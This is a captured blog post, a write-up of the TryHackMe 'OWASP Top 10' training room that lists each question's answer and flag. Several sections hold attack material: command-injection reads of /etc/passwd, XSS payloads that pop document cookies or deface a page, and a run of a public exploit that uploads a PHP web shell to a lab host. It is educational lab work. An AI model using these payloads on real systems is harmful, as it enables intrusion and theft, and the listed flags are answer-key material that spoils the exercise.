blog.raw.pm
Open in
urlscan Pro
35.185.44.232
Public Scan
URL:
https://blog.raw.pm/en/TryHackMe-OWASP-Top-10-write-up/
Submission: On August 23 via manual from PL — Scanned from DE
Submission: On August 23 via manual from PL — Scanned from DE
Form analysis
1 forms found in the DOM<form class="search-form">
<input type="text" class="ins-search-input search-form-input" placeholder="Search">
<button type="submit" class="search-form-submit"></button>
</form>
Text Content
* Linux * Security * Write-ups * CTF HackTheBox TryHackMe * Tags * Categories * About * Authors noraj Inventory Write-up Factory THTT Domains WRITEUPS OWASP TOP 10 - WRITE-UP - TRYHACKME Saturday 14 November 2020 (2020-11-14) Thursday 4 August 2022 (2022-08-04) noraj (Alexandre ZANNI) eop, idor, linux, owasp, thm, web, writeups, xxe INFORMATION ROOM# * Name: OWASP Top 10 * Profile: tryhackme.com * Difficulty: Easy * Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. OWASP Top 10 WRITE-UP OVERVIEW# Install tools used in this WU on BlackArch Linux: 1 $ sudo pacman -S exploitdb dbeaver python [DAY 1] COMMAND INJECTION PRACTICAL# #1# > What strange text file is in the website root directory? Answer: drpepper.txt Issue the ls command to list files. 1 css drpepper.txt evilshell.php index.php js #2# > How many non-root/non-service/non-daemon users are there? Answer: 0 Issue the cat /etc/passwd command, it seems there is no non-root/non-service/non-daemon users. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin #3# > What user is this app running as? Answer: www-data Issue the id command. 1 uid=33(www-data) gid=33(www-data) groups=33(www-data) #4# > What is the user's shell set as? Answer: /usr/sbin/nologin echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7. 1 /usr/sbin/nologin #5# > What version of Ubuntu is running? Answer: 18.04.4 Run cat /etc/os-release. 1 2 3 4 5 6 7 8 9 10 11 VERSION="18.04.4 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.4 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic #6# > Print out the MOTD. What favorite beverage is shown? Answer: DR PEPPER 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 $ ls -1 /etc/update-motd.d/ 10-help-text 50-landscape-sysinfo 50-motd-news 80-esm 80-livepatch 90-updates-available 91-release-upgrade 92-unattended-upgrades 95-hwe-eol 97-overlayroot 98-fsck-at-reboot 98-reboot-required $ cat /etc/update-motd.d/00-header # # 00-header - create the header of the MOTD # Copyright (C) 2009-2010 Canonical Ltd. # # Authors: Dustin Kirkland <kirkland@canonical.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. [ -r /etc/lsb-release ] && . /etc/lsb-release if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then # Fall back to using the very slow lsb_release utility DISTRIB_DESCRIPTION=$(lsb_release -s -d) fi printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)" DR PEPPER MAKES THE WORLD TASTE BETTER! [DAY 2] BROKEN AUTHENTICATION PRACTICAL# #1# > What is the flag that you found in darren's account? Register as darren and log in. Answer: fe86079416a21a3c99937fea8874b667 #3# > What is the flag that you found in arthur's account? Register as arthur and log in. Answer: d9ac0f7db4fda460ac3edeb75d75e16e [DAY 3] SENSITIVE DATA EXPOSURE (CHALLENGE)# #1# > Have a look around the webapp. The developer has left themselves a note > indicating that there is sensitive data in a specific directory. > > What is the name of the mentioned directory? Answer: /assets #2# > Navigate to the directory you found in question one. What file stands out as > being likely to contain sensitive data? Answer: webapp.db #3# > Use the supporting material to access the sensitive data. What is the password > hash of the admin user? Answer: 6eea9b7ef19179a06954edd0f6c05ceb Open the DB with dbeaver. #4# > Crack the hash. What is the admin's plaintext password? Answer: qwertyuiop Crack the password with crackstation. #5# > Login as the admin. What is the flag? Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} [DAY 4] XML EXTERNAL ENTITY - EXTENSIBLE MARKUP LANGUAGE# #1# > Full form of XML Answer: eXtensible Markup Language #2# > Is it compulsory to have XML prolog in XML documents? Answer: no #3# > Can we validate XML documents against a schema? Answer: yes 4# > How can we specify XML version and encoding in XML document? Answer: XML Prolog [DAY 4] XML EXTERNAL ENTITY - DTD# #1# > How do you define a new ELEMENT? Answer: !ELEMENT #2# > How do you define a ROOT element? Answer: !DOCTYPE #3# > How do you define a new ENTITY? Answer: !ENTITY [DAY 4] XML EXTERNAL ENTITY - EXPLOITING# #3# > What is the name of the user in /etc/passwd Answer: falcon #4# > Where is falcon's SSH key located? Answer: /home/falcon/.ssh/id_rsa #5# > What are the first 18 characters for falcon's private key Answer: MIIEogIBAAKCAQEA7b [DAY 5] BROKEN ACCESS CONTROL (IDOR CHALLENGE)# #3# > Look at other users notes. What is the flag? http://10.10.125.211/note.php?note=0 Answer: flag{fivefourthree} [DAY 6] SECURITY MISCONFIGURATION# #2# > Hack into the webapp, and find the flag! https://github.com/NinjaJc01/PensiveNotes Answer: thm{4b9513968fd564a87b28aa1f9d672e17} [DAY 7] CROSS-SITE SCRIPTING# #2# > Go to http://10.10.93.135/reflected and craft a reflected XSS payload that > will cause a popup saying "Hello". Answer: ThereIsMoreToXSSThanYouThink 1 <script>alert("Hello")</script> #3# > On the same reflective page, craft a reflected XSS payload that will cause a > popup with your machines IP address. 1 <script>alert(window.location.hostname)</script> Answer: ReflectiveXss4TheWin #4# > Now navigate to http://10.10.93.135/stored and make an account. > > Then add a comment and see if you can insert some of your own HTML. 1 <b>noraj is bold</b> Answer: HTML_T4gs #5# > On the same page, create an alert popup box appear on the page with your > document cookies. 1 <script>alert(document.cookies)</script> Answer: W3LL_D0N3_LVL2s #6# > Change "XSS Playground" to "I am a hacker" by adding a comment and using > Javascript. 1 <script>document.querySelector("#thm-title").textContent = "I am a hacker"</script> Answer: websites_can_be_easily_defaced_with_xss [DAY 8] INSECURE DESERIALIZATION# #1# > Who developed the Tomcat application? Answer: The Apache Software Fundation #2# > What type of attack that crashes services can be performed with insecure > deserialization? Answer: denial of service [DAY 8] INSECURE DESERIALIZATION - OBJECTS# #1# > Select the correct term of the following statement: Answer: A Behaviour [DAY 8] INSECURE DESERIALIZATION - DESERIALIZATION# #1# > What is the name of the base-2 formatting that data is sent across a network > as? Answer: binary [DAY 8] INSECURE DESERIALIZATION - COOKIES# #1# > If a cookie had the path of webapp.com/login , what would the URL that the > user has to visit be? Answer: webapp.com/login #2# > What is the acronym for the web technology that Secure cookies work over? Answer: HTTPS [DAY 8] INSECURE DESERIALIZATION - COOKIES PRACTICAL# #1# > 1st flag (cookie value) Answer: THM{good_old_base64_huh} 1 2 3 $ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d }q(X sessionIdqX c7dc44838e0847b1b45544948a92d194qX encodedflagqXTHM{good_old_base64_huh}qu. #2# > 2nd flag (admin dashboard) Answer: THM{heres_the_admin_flag} [DAY 8] INSECURE DESERIALIZATION - REMOTE CODE EXECUTION# #1# > flag.txt Answer: 4a69a7ff9fd68 [DAY 9] COMPONENTS WITH KNOWN VULNERABILITIES - LAB# > How many characters are in /etc/passwd (use wc -c /etc/passwd to get the > answer) Answer: 1611 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 $ searchsploit CSE bookstore ------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting | php/webapps/48973.txt CSE Bookstore 1.0 - Authentication Bypass | php/webapps/48960.txt ------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results $ searchsploit online book store ------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- GotoCode Online Bookstore - Multiple Vulnerabilities | asp/webapps/17921.txt Online Book Store 1.0 - 'bookisbn' SQL Injection | php/webapps/47922.txt Online Book Store 1.0 - 'id' SQL Injection | php/webapps/48775.txt Online Book Store 1.0 - Arbitrary File Upload | php/webapps/47928.txt Online Book Store 1.0 - Unauthenticated Remote Code Execution | php/webapps/47887.py ------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results $ searchsploit -p 47887 Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution URL: https://www.exploit-db.com/exploits/47887 Path: /usr/share/exploitdb/exploits/php/webapps/47887.py File Type: ASCII text, with CRLF line terminators $ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65 > Attempting to upload PHP web shell... > Verifying shell upload... > Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php > Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami > Do you wish to launch a shell here? (y/n): y RCE $ wc -c /etc/passwd 1611 /etc/passwd [DAY 10] INSUFFICIENT LOGGING AND MONITORING# > What IP address is the attacker using? Answer: 49.99.13.16 > What kind of attack is being carried out? Answer: brute force Share follow: * * * * * newer Google Dorking - Write-up - TryHackMe older Daily Bugle - Write-up - TryHackMe CATALOG 1. 1. Information 1. 1.1. Room 2. 2. Write-up 1. 2.1. Overview 2. 2.2. [Day 1] Command Injection Practical 1. 2.2.1. #1 2. 2.2.2. #2 3. 2.2.3. #3 4. 2.2.4. #4 5. 2.2.5. #5 6. 2.2.6. #6 3. 2.3. [Day 2] Broken Authentication Practical 1. 2.3.1. #1 2. 2.3.2. #3 4. 2.4. [Day 3] Sensitive Data Exposure (Challenge) 1. 2.4.1. #1 2. 2.4.2. #2 3. 2.4.3. #3 4. 2.4.4. #4 5. 2.4.5. #5 5. 2.5. [Day 4] XML External Entity - eXtensible Markup Language 1. 2.5.1. #1 2. 2.5.2. #2 3. 2.5.3. #3 4. 2.5.4. 4 6. 2.6. [Day 4] XML External Entity - DTD 1. 2.6.1. #1 2. 2.6.2. #2 3. 2.6.3. #3 7. 2.7. [Day 4] XML External Entity - Exploiting 1. 2.7.1. #3 2. 2.7.2. #4 3. 2.7.3. #5 8. 2.8. [Day 5] Broken Access Control (IDOR Challenge) 1. 2.8.1. #3 9. 2.9. [Day 6] Security Misconfiguration 1. 2.9.1. #2 10. 2.10. [Day 7] Cross-site Scripting 1. 2.10.1. #2 2. 2.10.2. #3 3. 2.10.3. #4 4. 2.10.4. #5 5. 2.10.5. #6 11. 2.11. [Day 8] Insecure Deserialization 1. 2.11.1. #1 2. 2.11.2. #2 12. 2.12. [Day 8] Insecure Deserialization - Objects 1. 2.12.1. #1 13. 2.13. [Day 8] Insecure Deserialization - Deserialization 1. 2.13.1. #1 14. 2.14. [Day 8] Insecure Deserialization - Cookies 1. 2.14.1. #1 2. 2.14.2. #2 15. 2.15. [Day 8] Insecure Deserialization - Cookies Practical 1. 2.15.1. #1 2. 2.15.2. #2 16. 2.16. [Day 8] Insecure Deserialization - Remote Code Execution 1. 2.16.1. #1 17. 2.17. [Day 9] Components With Known Vulnerabilities - Lab 18. 2.18. [Day 10] Insufficient Logging and Monitoring RECENTS * linuxandroid Android OTA payload dumping / extraction: 4 tools review Wednesday 3 August 2022 (2022-08-03) * linuxdebian QEMU/KVM/Virt-Manager guest support on Debian Friday 10 June 2022 (2022-06-10) * linuxarchlinux Install QEMU/KVM/Virt-Manager on ArchLinux Wednesday 1 June 2022 (2022-06-01) * linuxandroid Install LineageOS 19.1 on POCO F3 to replace MIUI 13.0.4 Monday 30 May 2022 (2022-05-30) * linuxandroid Root POCO F3 using Magisk from Linux Monday 30 May 2022 (2022-05-30) CATEGORIES * linux44 * android3 * archlinux17 * debian2 * opensuse7 * misc10 * programming6 * c1 * python2 * ruby2 * security26 * centos2 * linux1 * news5 * windows4 * windows4 * writeups297 TAG CLOUD AWS CVE IoT adctivedirectory android anonymity apache api archlinux azure backdoor bash bruteforce bsd burp bypass c cache centos cgi cloud cms code code-review cracking cron crypto cryptography crytpo csrf ctf cve debian deserialization desirialize devops dns docker dotnet eop event exploit exploitation extension fail2ban firefox flask forensics ftp gem git github gitlab gopher graphic guessing hash hijacking htb http hyper-v idor imagetragick imap jail jar java javascript jinja joy json kvm laravel lfi libraries lineageos linux log4j lua memcache metadata metasploit misc mobile mongodb motd msf nessus netbios netlify network news nfs nginx nikto nmap nodejs nosql omi open redirect opensuse osint otp owasp pacman pastejacking pcap pentest perl php pickle piracy pivoting powershell privacy programming proxy pwn python qbittorrent qemu race-condition rails raspberry-pi rce recon redis reverse root rpc rsync rtorrent ruby rzsh samba security service services shell smb smtp splunk sql sqli ssh ssrf ssti stegano sudo suid svn system thm tmux tomcat tor totp trivia update usenet user-agent virtualbox virtualization vpn vulnerability warez web webshell windows winrm wireshark wordpress writeups xss xxe zaproxy LINKS * Hexo * FOSS * EFF * Tor * I2P * Gitlab * ZeroDisclo * Bugcrowd * Hackerone © 2022 Alexandre ZANNI Posts Android OTA payload dumping / extraction: 4 tools review Introduction# Anyone that already tried to root their phone using Magisk's Patching Images method would have already encountered this issue. Magisk's QEMU/KVM/Virt-Manager guest support on Debian I wrote a more detailed article Install QEMU/KVM/Virt-Manager on ArchLinux but here I will focus on installing guest additions for QEMU/KVM on Debian. Install QEMU/KVM/Virt-Manager on ArchLinux Intro# In short QEMU is an emulator, KVM is a special mode of QEMU to support virtualization. KVM, Kernel-based Virtual Machine, is a hypervisor built Install LineageOS 19.1 on POCO F3 to replace MIUI 13.0.4 Disclaimer: those are basically the steps described on the LineageOS wiki. Check the wiki for updated information. Prerequisites# Phone unlocked (OEM Root POCO F3 using Magisk from Linux Disclaimer: for advanced power user only. If you don't understand what your are doing, then don't do it. Prerequisites# Phone unlocked (OEM unlock / M Pages HTTP Error 404 - Not Found 123456███████╗██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔══██╗ ██║ ██║██╔═████╗██║ ██║█████╗ ██████╔╝█ Authors Categories Domains Official domain names of Rawsec services. The blog: URL Description https://blog.raw.pm/ Main domain https://rawsec.ml/ Backup domain https://rawsec.g Tags Categories linuxlinux androidlinux/android debianlinux/debian archlinuxlinux/archlinux writeupswriteups Tags linuxlinux androidandroid virtualizationvirtualization systemsystem debiandebian